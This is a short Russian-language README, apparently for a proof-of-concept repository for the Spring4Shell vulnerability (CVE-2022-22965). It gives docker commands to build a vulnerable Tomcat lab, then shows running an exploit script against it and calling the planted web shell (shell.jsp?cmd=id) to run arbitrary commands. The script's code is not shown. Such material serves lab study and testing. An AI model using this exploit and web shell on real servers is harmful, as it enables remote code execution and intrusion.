
PoC и эксплойт для CVE-2022-22965 Spring4Shell
Spring4Shell (CVE-2022-22965) — Proof of Concept с уязвимым сервером Tomcat и уязвимым приложением spring4shell.
docker build . -t spring4shell
docker run -p 80:8080 spring4shell
При необходимости вы также можете запустить его с открытым портом отладчика:
docker run -p 80:8080 –p 5005:5005 spring4shell
Подробности о настройке удалённого отладчика в IntelliJ Idea смотрите в оригинальной статье в блоге!
./exploit.sh --url http://localhost/spring4shell/hello --dir spring4shell
Затем вы можете удалённо выполнять любые команды следующим образом:
curl http://localhost/spring4shell/shell.jsp?cmd=id --output -
…или открыв указанный выше URL.